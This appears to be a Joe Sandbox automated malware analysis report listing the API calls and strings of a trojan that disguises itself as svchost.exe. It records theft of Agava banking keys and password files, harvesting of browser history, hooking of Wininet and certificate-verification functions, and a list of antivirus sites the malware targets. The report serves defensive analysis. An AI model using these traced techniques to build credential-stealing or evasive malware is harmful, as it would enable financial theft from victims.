HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037FA
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403807
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040380A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040381D
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403820
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040382D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403830

Strings

<Actions , xrefs: 0040365A
00-->, xrefs: 0040368F
p=)u, xrefs: 0040379B

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
String ID: 00-->$<Actions $p=)u
API String ID: 3028510665-3614734336
Opcode ID: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
Instruction ID: 013638ac99e31dc1b3f0b1cbc1bcbf050739cfec6944e8e6b412d7e6261d8edc
Opcode Fuzzy Hash: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
Instruction Fuzzy Hash: 32A1C0B1500311ABC720DF64CC49F5B7BA8EFC8751F048A69FA49A7391D774EA04CBA4

Function 02D231A0 Relevance: 49.3, APIs: 17, Strings: 11, Instructions: 273stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02D24800: memset.MSVCRT ref: 02D24824
Part of subcall function 02D24800: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D2482F

OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 02D231C6
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D231E5
GetHandleInformation.KERNEL32(00000000,?), ref: 02D231F7
CloseHandle.KERNEL32(00000000), ref: 02D23208
GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 02D23250
strstr.MSVCRT ref: 02D23264
GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 02D232A4
strstr.MSVCRT ref: 02D232B2
strstr.MSVCRT ref: 02D232C7
SetCurrentDirectoryA.KERNEL32(?), ref: 02D23364
PathAddBackslashA.SHLWAPI(02D5CF94), ref: 02D2339D

Strings

Containers, xrefs: 02D2324B, 02D2329F
keys.zip, xrefs: 02D233E8
.ini, xrefs: 02D23232
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D234DE
UseToken, xrefs: 02D23246
Agava_keys, xrefs: 02D23338
\t, xrefs: 02D23392
keys_path.txt, xrefs: 02D23478
KeysDiskPath, xrefs: 02D2329A
Agava_Client.ini, xrefs: 02D232C1
Agava_Client.exe, xrefs: 02D231AC

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
String ID: .ini$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$UseToken$keys.zip$keys_path.txt$\t
API String ID: 2651364649-733209536
Opcode ID: ff47f0b48860b5a7b6ec0bddeeba6f7b8e8d5014d76c5402560abecc1bc6b0db
Instruction ID: 66dfc5bf6e9da3fa054b5bcde98ddbb9a583e1a6a6249cd93574e4b7ee2288c0
Opcode Fuzzy Hash: ff47f0b48860b5a7b6ec0bddeeba6f7b8e8d5014d76c5402560abecc1bc6b0db
Instruction Fuzzy Hash: 67A136349402699FDB16CF24A8A8BEA7BE4EF69304F1485D4E985D7340EB709E4DCBD0

Function 02D10EF0 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 137libraryloadermemoryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,7591F550,00000000), ref: 02D10F0E
GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02D10F24
VirtualProtect.KERNEL32(00000000,00000006,00000040,?,75921620), ref: 02D10F3C
VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02D10F5E
LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02D10F6A
GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02D10F80
GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02D10F9C
GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02D10FB8
GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02D10FD4
GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02D10FF0
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02D1100C
GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02D11028
GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02D11044
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02D11060

Strings

CertVerifyCertificateChainPolicy, xrefs: 02D10F1E
InternetReadFile, xrefs: 02D11006
InternetCloseHandle, xrefs: 02D1105A
InternetQueryDataAvailable, xrefs: 02D10FEA
InternetReadFileExW, xrefs: 02D1103E
InternetReadFileExA, xrefs: 02D11022
HttpSendRequestA, xrefs: 02D10F7A
HttpSendRequestExA, xrefs: 02D10FB2
Crypt32.dll, xrefs: 02D10EFC
HttpSendRequestExW, xrefs: 02D10FCE
HttpSendRequestW, xrefs: 02D10F96
Wininet.dll, xrefs: 02D10F65

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadProtectVirtual
String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
API String ID: 1705253364-835984666
Opcode ID: 9311b9ab34583adc6326987d5b4eb2f440b585048ca484e34984577a5a3ae0c4
Instruction ID: 2e8bab0f22fd85b838cfb6e8b2748f53643499a9f4d88a3c942aafce0766f9ab
Opcode Fuzzy Hash: 9311b9ab34583adc6326987d5b4eb2f440b585048ca484e34984577a5a3ae0c4
Instruction Fuzzy Hash: F6317A74B8131677FA20BA72BC13F9B235D9F01E95F200110B906B2B85DEA9ED49C978

Function 02D1E2FC Relevance: 44.0, APIs: 17, Strings: 8, Instructions: 259fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?), ref: 02D1E308
StrStrIA.SHLWAPI(?,found.), ref: 02D1E323
StrStrIA.SHLWAPI(?,asus), ref: 02D1E33E
PathAddBackslashA.SHLWAPI(5C5905E0), ref: 02D1E364
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1E39E
GetLastError.KERNEL32 ref: 02D1E3A8
IsUserAnAdmin.SHELL32 ref: 02D1E3B0
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1E3BF
SetLastError.KERNEL32(00000000), ref: 02D1E3C6
PathAddBackslashA.SHLWAPI(5C5905E0,?,?), ref: 02D1E469
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1E4A3
GetLastError.KERNEL32 ref: 02D1E4AD
IsUserAnAdmin.SHELL32 ref: 02D1E4B5
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1E4C4
SetLastError.KERNEL32(00000000), ref: 02D1E4CB
FindNextFileA.KERNEL32(?,?), ref: 02D1E5BF
SetErrorMode.KERNEL32(?), ref: 02D1E5F3

Strings

5C5905E0, xrefs: 02D1E35F, 02D1E36A, 02D1E464, 02D1E46F
found., xrefs: 02D1E316
keys, xrefs: 02D1E3D9
.txt, xrefs: 02D1E528
asus, xrefs: 02D1E331
path, xrefs: 02D1E4DE
.zip, xrefs: 02D1E428
\t, xrefs: 02D1E364, 02D1E469

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
String ID: .txt$.zip$5C5905E0$asus$found.$keys$path$\t
API String ID: 2233314381-2085748686
Opcode ID: 6d7f317ec6fd087891b061702d81cd29f1248250dbb53b33278163f38f66b0c1
Instruction ID: dc673bec8987248d7538214439e8d9937919bb53a92d00ebc035a62943bb32c1
Opcode Fuzzy Hash: 6d7f317ec6fd087891b061702d81cd29f1248250dbb53b33278163f38f66b0c1
Instruction Fuzzy Hash: CE91E1345083469FDB25CF34A468AABBBE5AF99345F188A58ECC6C7300EB71DD09C791

Function 02D1EB30 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 217filethreadCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02D1EB5D
PathAddBackslashA.SHLWAPI(5C59047E), ref: 02D1EB9E
PathAddBackslashA.SHLWAPI(5C59047E), ref: 02D1EBD2
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1EBE7
GetLastError.KERNEL32 ref: 02D1EBF1
IsUserAnAdmin.SHELL32 ref: 02D1EBF9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1EC0A
SetLastError.KERNEL32(00000000), ref: 02D1EC11
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D1EC4B
DeleteFileA.KERNEL32(?), ref: 02D1EC58
PathAddBackslashA.SHLWAPI(5C59047E,02D4FDB8,02D4FDB9), ref: 02D1EC99
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1ECD4
GetLastError.KERNEL32 ref: 02D1ECDE
IsUserAnAdmin.SHELL32 ref: 02D1ECE6
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1ECF7
SetLastError.KERNEL32(00000000), ref: 02D1ECFE
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D1ED3B
DeleteFileA.KERNEL32(?), ref: 02D1ED48
CreateThread.KERNEL32(00000000,00000000,02D1EF40,02D4FDB8,00000000,00000000), ref: 02D1ED7E
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1ED96
CloseHandle.KERNEL32(00000000), ref: 02D1EDA7

Strings

path.txt, xrefs: 02D1EC28
pass.log, xrefs: 02D1ED18
prv_key.pfx, xrefs: 02D1EB57
5C59047E, xrefs: 02D1EB99, 02D1EBA0, 02D1EBCB, 02D1EBD4, 02D1EC94, 02D1EC9B

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
String ID: 5C59047E$pass.log$path.txt$prv_key.pfx
API String ID: 448721894-3495669106
Opcode ID: 6d98edd1356f646e893931a88946a1c5cb00af86fa334acd66086d2f6863d980
Instruction ID: cdce3b231bb5d6b8a61db520b8764f254298286acde91bafd35388adb0bf35ac
Opcode Fuzzy Hash: 6d98edd1356f646e893931a88946a1c5cb00af86fa334acd66086d2f6863d980
Instruction Fuzzy Hash: C7710338A40255AFDB118F38B868BEA7BE5EF56300F548991ED86C7340DBB0DD44CBA0

Function 02D046C0 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 178fileregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02D046E5
_snprintf.MSVCRT ref: 02D0470D
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,75923490), ref: 02D04747
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04769
LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D04775
WriteFile.KERNEL32(00000000,IE history:,0000000C,02D056A1,00000000), ref: 02D04789
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D04797
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D047AB
LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D047B7
WriteFile.KERNEL32(00000000,02D45B10,00000001,00000000,00000000), ref: 02D047CB
UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D047D9
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04803
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D0480F
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D04824
UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D04834
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04848
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04854
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D04868
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04876
_snprintf.MSVCRT ref: 02D04895
RegCloseKey.ADVAPI32(?), ref: 02D048AC

Strings

Software\Microsoft\Internet Explorer\TypedURLs, xrefs: 02D046D4
url%i, xrefs: 02D046F5, 02D04881
IE history:, xrefs: 02D04783

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
API String ID: 757183407-427538202
Opcode ID: 107fc73b7ebe6c98f1260f6713d6c6a10634c96e7ce9b3b4bdf1ebf7cba63c0c
Instruction ID: 658633b79877fc7890b0424feb4462409f6c64f17e6b965ece3a8ac57aaed000
Opcode Fuzzy Hash: 107fc73b7ebe6c98f1260f6713d6c6a10634c96e7ce9b3b4bdf1ebf7cba63c0c
Instruction Fuzzy Hash: 97514C75A91319BBF7209B90AC8AFEF77B8EB45B05F504445F701AA2C0D7F06E048BA5

Function 02D15020 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169memorysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02D14330: IsUserAnAdmin.SHELL32 ref: 02D1433A
Part of subcall function 02D14330: memset.MSVCRT ref: 02D14370
Part of subcall function 02D14330: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02D14397
Part of subcall function 02D14330: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02D143BA
Part of subcall function 02D14330: GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02D1442D
Part of subcall function 02D14330: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D14434
Part of subcall function 02D14330: memset.MSVCRT ref: 02D14444

GetTickCount.KERNEL32 ref: 02D1503F
_snprintf.MSVCRT ref: 02D15054

Part of subcall function 02D14AF0: IsNetworkAlive.SENSAPI(02D06BEE,00000000), ref: 02D14B03
Part of subcall function 02D14AF0: IsUserAnAdmin.SHELL32 ref: 02D14B11
Part of subcall function 02D14AF0: DnsFlushResolverCache.DNSAPI ref: 02D14B1B
Part of subcall function 02D14AF0: memset.MSVCRT ref: 02D14B38
Part of subcall function 02D14AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75920F10), ref: 02D14B57
Part of subcall function 02D14AF0: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D14B70
Part of subcall function 02D14AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D14B83
Part of subcall function 02D14AF0: memset.MSVCRT ref: 02D14B9C
Part of subcall function 02D14AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75920F10), ref: 02D14BB5
Part of subcall function 02D14AF0: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D14BC8
Part of subcall function 02D14AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D14BD5

Sleep.KERNEL32(000001F4), ref: 02D15075
GetTempPathA.KERNEL32(00000104,?), ref: 02D1508C
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02D150A4
GetProcessHeap.KERNEL32(00000000,?,00000000,00000001,00000000,?,?,Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000001,?,?,00000001,00000000), ref: 02D1512C
HeapValidate.KERNEL32(00000000), ref: 02D1512F
GetProcessHeap.KERNEL32(00000000,?), ref: 02D1513C
HeapFree.KERNEL32(00000000), ref: 02D1513F
RtlImageNtHeader.NTDLL(00000000), ref: 02D15165

Strings

A3B7FAF8a, xrefs: 02D15029
id=1&post=%u, xrefs: 02D15046
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D150C2
C:\Windows\apppatch\svchost.exe, xrefs: 02D15173, 02D1519B, 02D151B0, 02D151BB, 02D151D1
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D150CB, 02D150E0, 02D15108

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$memset$Process$AdminCheckConnectionInternetTempUserlstrcpyn$AliveAllocCacheCountFileFlushFreeHeaderImageNameNetworkOpenPathQueryResolverSleepTickValidateValue_snprintf
String ID: A3B7FAF8a$C:\Windows\apppatch\svchost.exe$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$id=1&post=%u
API String ID: 2364452126-2209314532
Opcode ID: d7a0c50bc13c9be02e6f1c9ec4d48e4378c97c2954396d3c26c2687645dc9fb2
Instruction ID: 8275bf6b0d13e5cf232659feaff349229e1e6bede5c0d4bc8d4a22722223b7da
Opcode Fuzzy Hash: d7a0c50bc13c9be02e6f1c9ec4d48e4378c97c2954396d3c26c2687645dc9fb2
Instruction Fuzzy Hash: 1B51C875A80315BBFB209FA4BC89FEA37A9DF54744F940444FA0597380EBB4AD44CBA1

Function 02D05EB0 Relevance: 39.1, APIs: 13, Strings: 13, Instructions: 76COMMON

Download Yara Rule

APIs

StrStrIW.SHLWAPI(?,avast.com,?,?,02D0604F), ref: 02D05ECB
StrStrIW.SHLWAPI(?,kaspersky,?,avast.com,?,?,02D0604F), ref: 02D05EDB
StrStrIW.SHLWAPI(?,drweb,?,kaspersky,?,avast.com,?,?,02D0604F), ref: 02D05EEB
StrStrIW.SHLWAPI(?,eset.com,?,drweb,?,kaspersky,?,avast.com,?,?,02D0604F), ref: 02D05EF7
StrStrIW.SHLWAPI(?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com,?,?,02D0604F), ref: 02D05F03
StrStrIW.SHLWAPI(?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com,?,?,02D0604F), ref: 02D05F0F
StrStrIW.SHLWAPI(?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com,?), ref: 02D05F1B
StrStrIW.SHLWAPI(?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com), ref: 02D05F27
StrStrIW.SHLWAPI(?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky), ref: 02D05F33
StrStrIW.SHLWAPI(?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb), ref: 02D05F3F
StrStrIW.SHLWAPI(?,trendsecure,?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com), ref: 02D05F4B
StrStrIW.SHLWAPI(?,anti-malware,?,trendsecure,?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir), ref: 02D05F57
StrStrIW.SHLWAPI(?,.comodo.com,?,anti-malware,?,trendsecure,?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira), ref: 02D05F63

Strings

eset.com, xrefs: 02D05EF1
trendsecure, xrefs: 02D05F45
kaspersky, xrefs: 02D05ED5
z-oleg.com, xrefs: 02D05F2D
antivir, xrefs: 02D05EFD
kltest.org.ru, xrefs: 02D05F39
avira, xrefs: 02D05F09
virusinfo, xrefs: 02D05F21
.comodo.com, xrefs: 02D05F5D
virustotal, xrefs: 02D05F15
drweb, xrefs: 02D05EE5
avast.com, xrefs: 02D05EC5
anti-malware, xrefs: 02D05F51

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$kltest.org.ru$trendsecure$virusinfo$virustotal$z-oleg.com
API String ID: 0-3008981035
Opcode ID: ccf3ec4319d899d83e65ffb024a275d79469da8cd78528dbd9566d9469de898b
Instruction ID: ea5c9607e311229adf9a16cdcad5f6d9c7d495af9b90d3c2625b4c01d246ef30
Opcode Fuzzy Hash: ccf3ec4319d899d83e65ffb024a275d79469da8cd78528dbd9566d9469de898b
Instruction Fuzzy Hash: 53111C52386B26277611316A7C95F5F464CAD61C8A3C90624FC01F53D4EB8DCD074E69

Function 00402EA0 Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 436commemoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,?), ref: 00402EB0
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402ED0
CoCreateInstance.OLE32(004043E8,00000000,00000001,004041D8,?), ref: 00402EF7
VariantInit.OLEAUT32(?), ref: 00402F0F
VariantInit.OLEAUT32(?), ref: 00402F2A
VariantInit.OLEAUT32(?), ref: 00402F48
VariantInit.OLEAUT32(?), ref: 00402F66
VariantClear.OLEAUT32(?), ref: 00402FEC
VariantClear.OLEAUT32(?), ref: 00402FF2
VariantClear.OLEAUT32(?), ref: 00402FF8
VariantClear.OLEAUT32(?), ref: 00402FFE
InterlockedDecrement.KERNEL32(.5@), ref: 0040303D
SysAllocString.OLEAUT32(00404F3C), ref: 004031E6
VariantInit.OLEAUT32(?), ref: 0040320B
VariantInit.OLEAUT32(?), ref: 00403229

Part of subcall function 00402DC0: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00403011,00404F28), ref: 00402DC8
Part of subcall function 00402DC0: HeapAlloc.KERNEL32(00000000,?,00403011,00404F28), ref: 00402DCF
Part of subcall function 00402DC0: SysAllocString.OLEAUT32(00403011), ref: 00402DF0

VariantClear.OLEAUT32(?), ref: 004032D6
VariantClear.OLEAUT32(?), ref: 004032DC
VariantClear.OLEAUT32(?), ref: 004032E2

Strings

.5@, xrefs: 00403009, 00403030, 00403071, 00403095, 00403146, 00403166, 004031AA, 004031CA, 00403241, 004032C8, 0040303C
.5@, xrefs: 0040306D, 00403237, 00403070, 00403240
cmd.exe, xrefs: 00403141
p=)u, xrefs: 00402F05, 004031F2

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
String ID: .5@$.5@$cmd.exe$p=)u
API String ID: 2839743307-1153045067
Opcode ID: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
Instruction ID: 7356d6b497d974f43c465eb486c8ab872bac2c341a44699d5e6db9722a73acc6
Opcode Fuzzy Hash: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
Instruction Fuzzy Hash: 65F1EA75E102199FCB00DFA8C884A9EBBB9FF88710F15816AE914BB391D774AD41CF94

Function 02D19E50 Relevance: 37.7, APIs: 25, Instructions: 190threadmemoryCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 02D19E76
GetThreadPriority.KERNEL32(00000000,?,02D1A160,00000000,00000000,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D19E7D
GetTickCount.KERNEL32 ref: 02D19E86
VirtualProtect.KERNEL32(02D1A160,00000008,00000040,?,?,02D1A160,00000000,00000000,?,?,?,?,?,?,02D1938A,00000000), ref: 02D19EA7
VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02D19EC6
VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02D19EE2
InterlockedExchange.KERNEL32(00000000,00000004), ref: 02D19EF8
InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02D19F06
InterlockedExchange.KERNEL32(00000005,00000000), ref: 02D19F11
InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02D19F24
InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02D19F35
InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02D19F44
InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02D19F53
InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02D19F62
InterlockedExchange.KERNEL32(00000006,?), ref: 02D19F6A
InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02D19F7D
InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02D19F8E
InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02D19F9D
InterlockedExchange.KERNEL32(00000005,00000000), ref: 02D19FA9
VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02D19FB3
GetCurrentThread.KERNEL32 ref: 02D19FBB
SetThreadPriority.KERNEL32(00000000), ref: 02D19FC2
GetCurrentThread.KERNEL32 ref: 02D19FFE
SetThreadPriority.KERNEL32(00000000), ref: 02D1A005
VirtualProtect.KERNEL32(02D1A160,00000008,00000000,02D1A160), ref: 02D1A01F

Memory Dump Source

